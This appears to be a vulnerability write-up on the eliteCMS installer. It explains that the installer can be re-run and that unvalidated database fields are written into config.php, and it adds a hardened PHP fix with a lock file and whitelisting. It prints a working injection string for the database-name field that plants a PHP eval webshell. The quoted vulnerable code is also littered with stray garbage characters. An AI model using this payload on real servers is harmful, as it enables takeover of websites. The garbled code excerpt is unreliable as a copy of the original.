The eliteCMS installer is not locked once installation has finished, so an attacker can re-run the installation simply by requesting the installer URL again.
A second vulnerability: the installer can write a one-line PHP webshell (一句话木马) directly into admin/includes/config.php.
Let's look at the code:
. v0 x& y# X, I
8 J. l2 M! b$ {7 x# u...% @( e" b5 i1 D$ f! ?
elseif ($_GET['step'] == "4") {/ D; Q6 Y0 C' M
$file = "../admin/includes/config.php";
7 Y6 ^8 d, a- j0 ^$ r9 v $write = "<?php\n";( n: K4 X. n* s# @* t7 B, r' X/ A
$write .= "/**\n";9 `1 F$ B+ [% ^+ m" Q+ g, c* Y, i* f
$write .= "*\n";
4 p" u5 H& h! K+ S' }: X $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";% v0 L6 m, Z# L- @* H* y
...略...
\! d8 x. M7 V% {3 q0 W $write .= "*\n";/ O$ V2 f5 B2 P: T4 ]9 u8 E
$write .= "*/\n";
0 j/ x6 ]8 Q" z4 z$ R2 z; G $write .= "\n";9 f. @. ?2 v# J0 a
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
9 M, a( H8 E4 A% I% Z $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n"; y$ w; y5 Y/ w1 M9 ~- V
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
+ w; Y4 M( w4 B/ O. r3 U $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
* H, f5 D/ ^% j1 l% c6 f% v2 i $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";8 [/ U, w* {0 o+ l
$write .= "if (!\$connection) {\n";) q+ b, O/ Q/ d C
$write .= " die(\"Database connection failed\" .mysql_error());\n";
7 D2 f" Z, D3 X" _$ @ W _9 |( U $write .= " \n"; {2 J, w2 q& ~0 h7 P( n& Q
$write .= "} \n";
( q: G5 b i) N9 I' K& E $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";. ]' ]) S' E( I) ^- K- |
$write .= "if (!\$db_select) {\n";
, b0 u# X: K& A0 I) [% k, B $write .= " die(\"Database select failed\" .mysql_error());\n";6 t- K6 C0 |9 c
$write .= " \n";( i/ b. E f/ b
$write .= "} \n";; q8 q6 D4 d7 N$ ?9 z& C I/ Q# ]
$write .= "?>\n"; g P) y0 o0 w! B( b
2 P: {5 @+ D, F $writer = fopen($file, 'w');
5 D4 ~3 ^: A, r Y) {/ b1 {+ K4 H...
6 c: _2 \, k- J* p. @" b # k" v J* j9 Q9 V0 L5 H; H( Z- b
Now look at the code that fills those session values:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken straight from the POST request without any validation.
If the database name sent in the POST data is:

"?><?php eval($_POST[c]);?><?php

then a one-line backdoor is written into /admin/includes/config.php.
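As an added example (not eliteCMS's own code; the paths, the install-lock name and the helper function names are assumptions), here is a hardened step-4 writer that fixes both problems: it refuses to run once an install lock exists, whitelists every value, and emits the constants with var_export() so a value is always a quoted string literal rather than PHP source. The database name shown above fails the whitelist outright, and even a value that passed it could not break out of the literal.

```php
<?php
// Added example, not eliteCMS code. Paths and the lock-file name are assumptions.
define('CONFIG_FILE',  __DIR__ . '/../admin/includes/config.php');
define('INSTALL_LOCK', __DIR__ . '/install.lock');

// Return the validated DB settings or throw. Each value must match a strict
// whitelist, so quotes, newlines, NUL bytes and '?>' never reach the file.
function validateDbSettings(array $post): array {
    $rules = [
        'DB_SERVER' => '/\A[A-Za-z0-9._:-]{1,253}\z/',   // host or host:port
        'DB_NAME'   => '/\A[A-Za-z0-9_$]{1,64}\z/',      // MySQL identifier chars
        'DB_USER'   => '/\A[A-Za-z0-9_.@-]{1,32}\z/',
        'DB_PASS'   => '/\A[^\x00-\x1F\x7F]{0,128}\z/',  // printable bytes only
    ];
    $clean = [];
    foreach ($rules as $key => $re) {
        $value = (isset($post[$key]) && is_string($post[$key])) ? $post[$key] : '';
        if (!preg_match($re, $value)) {
            throw new InvalidArgumentException("Rejected value for $key");
        }
        $clean[$key] = $value;
    }
    return $clean;
}

// Build config.php from validated values. var_export() emits a quoted, escaped
// PHP string literal, so the value is data and is never parsed as code
// (a '?>' inside a string literal does not end PHP mode).
function buildConfigSource(array $db): string {
    $src = "<?php\n// generated by the installer\n";
    foreach ($db as $key => $value) {
        $src .= sprintf("define('%s', %s);\n", $key, var_export($value, true));
    }
    return $src;   // no closing '?>' tag, so nothing trails the PHP block
}
// Step-4 handler: refuse to run once the install lock exists, write the file,
// then create the lock so the installer cannot be replayed.
function writeConfigOnce(array $post): void {
    if (file_exists(INSTALL_LOCK)) {
        http_response_code(403);
        exit('Installer is locked.');
    }
    $source = buildConfigSource(validateDbSettings($post));
    if (file_put_contents(CONFIG_FILE, $source, LOCK_EX) === false) {
        throw new RuntimeException('Could not write config file');
    }
    chmod(CONFIG_FILE, 0640);
    touch(INSTALL_LOCK);
}
```

The generated file should also not be served directly: keeping config.php outside the web root, or denying direct requests to admin/includes/ in the web server configuration, limits the damage if the writer is ever reached again.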